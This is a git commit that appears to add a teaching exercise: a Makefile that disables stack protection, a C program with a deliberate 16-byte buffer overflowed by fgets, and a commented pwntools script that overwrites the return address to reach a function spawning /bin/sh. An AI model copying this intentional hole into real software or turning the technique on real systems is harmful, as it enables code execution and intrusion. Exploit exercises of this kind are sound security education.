Add rop example

qhdwight · qhdwight · commit c3dffcaf8cdb · 2023-02-07T17:35:58.000-05:00
diff --git a/rop_chaining/Makefile b/rop_chaining/Makefile
@@ -0,0 +1,9 @@
+CC=gcc
+CFLAGS=-I. -fno-stack-protector -no-pie -Wno-stringop-overflow -Wno-nonnull -static
+
+# Statically linked to give more gadgets
+buffer_overflow: rop.c
+	$(CC) $(CFLAGS) -o rop rop.c
+
+clean:
+	$(RM) rop
diff --git a/rop_chaining/rop.c b/rop_chaining/rop.c
@@ -0,0 +1,25 @@
+#include <stdio.h>  // For puts and fgets
+#include <unistd.h> // For execve
+#include <stdlib.h>
+
+void access_vault(int code)
+{
+  if (code == 1337) {
+    puts("Access granted");
+    execve("/bin/sh", NULL, NULL);
+  } else {
+    puts("Access denied!");
+  }
+}
+
+int main()
+{
+  char input_buffer[16];
+  puts("Enter the password to access Santa Ono's secret vault:");
+
+  fgets(input_buffer, 32, stdin); // Nothing can go wrong here right?
+
+  puts("HAHA you thought! There was no password, you can NEVER get in >:)");
+
+  return EXIT_SUCCESS;
+}
diff --git a/rop_chaining/solve.py b/rop_chaining/solve.py
@@ -0,0 +1,57 @@
+#!/usr/bin/env python3
+
+from pwn import *
+
+ACCESS_VAULT_FUNCTION_ADDR = 0x00401146
+
+# Tell pwntools our target process to automate future functions
+elf = context.binary = ELF('rop')
+
+io = process()  # Actually start running the process
+
+# Wait until we are prompted with input
+# Notice how we use the "b" literal to mark it as a bytes object
+# https://docs.python.org/3/library/stdtypes.html#binary-sequence-types-bytes-bytearray-memoryview
+io.recvuntil(b"Enter the password to access Santa Ono's secret vault:")
+
+# "disassemble main" in GDB launched with "gdb buffer_overflow"
+# Dump of assembler code for function main:
+#    0x0000000000401175 <+0>:     push   rbp
+#    0x0000000000401176 <+1>:     mov    rbp,rsp
+#    0x0000000000401179 <+4>:     sub    rsp,0x10
+#    0x000000000040117d <+8>:     lea    rax,[rip+0xe9c]            # 0x402020
+#    0x0000000000401184 <+15>:    mov    rdi,rax
+#    0x0000000000401187 <+18>:    call   0x401030 <puts@plt>
+#    0x000000000040118c <+23>:    mov    rdx,QWORD PTR [rip+0x2ead] # 0x404040 <stdin@GLIBC_2.2.5>
+#    0x0000000000401193 <+30>:    lea    rax,[rbp-0x10]
+#    0x0000000000401197 <+34>:    mov    esi,0x20
+#    0x000000000040119c <+39>:    mov    rdi,rax
+#    0x000000000040119f <+42>:    call   0x401040 <fgets@plt>
+#    0x00000000004011a4 <+47>:    lea    rax,[rip+0xead]            # 0x402058
+#    0x00000000004011ab <+54>:    mov    rdi,rax
+#    0x00000000004011ae <+57>:    call   0x401030 <puts@plt>
+#    0x00000000004011b3 <+62>:    mov    eax,0x0
+#    0x00000000004011b8 <+67>:    leave
+#    0x00000000004011b9 <+68>:    ret                           <----- reads our injected return address!
+
+# In assembly you can read "sub rsp,0x10" at the start of "main"
+# We need to write past 0x10 bytes to start modifying maliciously
+dummy_data = b'A' * 0x10
+# The saved ebp doesn't really matter
+# We only execute one other function which doesn't need it
+saved_ebp = b'B' * 8
+# We have to pack the address properly (endianess!)
+redirect_addr = p64(ACCESS_VAULT_FUNCTION_ADDR)
+# Craft the final bytes payload
+payload = dummy_data + saved_ebp + redirect_addr
+
+# Overflow stack and get redirection
+# fgets will write past the end of the stack frame
+# It will set the return eip on the stack
+# The "ret" instruction will use this to go to our address
+io.send(payload)
+
+# Open up stdin to terminal input
+# Required so you can start using the shell interactively
+# Generally speaking you add this after popping a shell
+io.interactive()
